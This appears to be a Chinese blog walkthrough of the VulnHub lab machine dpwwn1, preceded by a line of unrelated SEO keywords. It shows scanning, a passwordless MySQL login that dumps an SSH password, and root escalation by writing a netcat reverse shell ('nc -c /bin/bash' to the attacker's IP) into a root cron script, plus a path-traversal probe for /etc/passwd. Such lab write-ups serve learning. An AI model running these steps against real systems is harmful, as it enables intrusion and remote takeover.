怎样建设自己的ip地址网站,如何进行账号推广,郑州比较好的设计公司,哪种编程语言可以做网站#x1f36c; 博主介绍#x1f468;#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 hacker-routing #xff0c;很高兴认识大家~
✨主攻领域#xff1a;【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
#x1f389;点赞➕评论➕收藏… 博主介绍 博主介绍大家好我是 hacker-routing 很高兴认识大家~
✨主攻领域【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
点赞➕评论➕收藏 养成习惯一键三连
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限欢迎各位大佬指点相互学习进步 目录 前言
一、信息收集
1、主机探测
2、端口扫描
3、漏洞扫描
nmap扫描
nikto扫描
二、渗透测试
1、目录扫描信息收集
2、mysql免密码登录
3、ssh远程登录
三、提权 前言
靶机精讲之dpwwn1vulnhub靶机很能体现思路为王的一台机器艰难的撕口子过程全程展现只希望你感同身受。直接告诉你怎么撕口子你肯定觉得很简单但就是这个方式如果你偏偏想不到那这台机器你难以为继。希望你借此机器能够感同身受地思考你的渗透优先级选择和路径权衡。mysql空密码撕口子自动任务提权。你能想到吗少年 一、信息收集
1、主机探测
发现靶机的IP地址是192.168.103.152
┌──(rootkali)-[~]
└─# arp-scan -l2、端口扫描
靶机开放了22、80、3306端口
┌──(root??kali)-[~]
└─# nmap -sS -A -p- 192.168.103.152 3、漏洞扫描
nmap扫描
nmap漏洞扫描web没有发现什么漏洞3306端口的mysql到时候可以尝试弱口令登录或者看看免密码登录都是可以的因为这是靶机渗透测试一般这种情况还是常见的。
┌──(root??kali)-[~]
└─# nmap --scriptvuln -p22,80,3306 192.168.103.152--scriptvuln 表示使用漏洞脚本模块进行扫描-p22,80,3306 则指定了要扫描的端口号(22、80和3306)最后192.168.103.152 是你指定的目标主机的IP地址 nikto扫描
版本信息Apache/2.4.6 (CentOS) PHP/5.4.16目录/info.php、/icons/README可能存在文件包含漏洞/info.php?file
┌──(rootkali)-[~]
└─# nikto -h 192.168.103.152info.php和/icons/README都没有什么有价值的信息 http://192.168.103.152/info.php?file../../../../etc/passwd也不存在文件包含漏洞
到现在我们渗透测试还是非常的迷茫没有什么线索接下来只能从目录上找手了 二、渗透测试
1、目录扫描信息收集
结果很不乐观没有什么新的收获目前只有3306的mysql没有尝试了我们接下来的渗透测试工作就可以放在3306端口的mysql登录上。
┌──(root??kali)-[~]
└─# dirb http://192.168.103.152 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt是kali常用于目录爆破的字典刚兴趣的小伙伴可以收藏下。 2、mysql免密码登录
很幸运我们利用3306端口的mysql免密码登录成功了接下来我们尝试在数据库里面看看有没有账号密码可以给我们到时候ssh登录的
mysql -h 192.168.103.152 -u root -p发现了一串账号密码 mysql show databases;
--------------------
| Database |
--------------------
| information_schema |
| mysql |
| performance_schema |
| ssh |
--------------------
4 rows in set (0.01 sec)mysql use ssh;
Database changed
mysql show tables;
---------------
| Tables_in_ssh |
---------------
| users |
---------------
1 row in set (0.03 sec)mysql select * from users;
-----------------------------------
| id | username | password |
-----------------------------------
| 1 | mistic | testP$$swordmistic |
-----------------------------------
1 row in set (0.02 sec)mysql3、ssh远程登录
ssh远程登录成功
┌──(rootkali)-[~]
└─# ssh mistic192.168.103.152三、提权
SUID和sudo提权都没有用 查看定时任务
发现有一个定时任务是以root权限执行看到这个我们可以想利用写入一个木马然后利用kali进行监听然后反弹shell进行提权 修改定时任务的内容写入反弹shell木马
这里给小伙伴们推荐一个提权自动化写木马的网站很好用而且界面也非常的好看
Online - Reverse Shell GeneratorOnline Reverse Shell generator with Local Storage functionality, URI Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.https://www.revshells.com/ 修改logrot.sh文件
nc -c /bin/bash 192.168.103.129 4444 kali先进性反弹shell监听定时任务每隔3分钟执行一次就可以进行反弹shell了
┌──(rootkali)-[~]
└─# nc -lvvp 4444 python -c import pty; pty.spawn (/bin/bash) ##交互式shell 恭喜小伙伴们成功完成了这个挑战并且拿到了root权限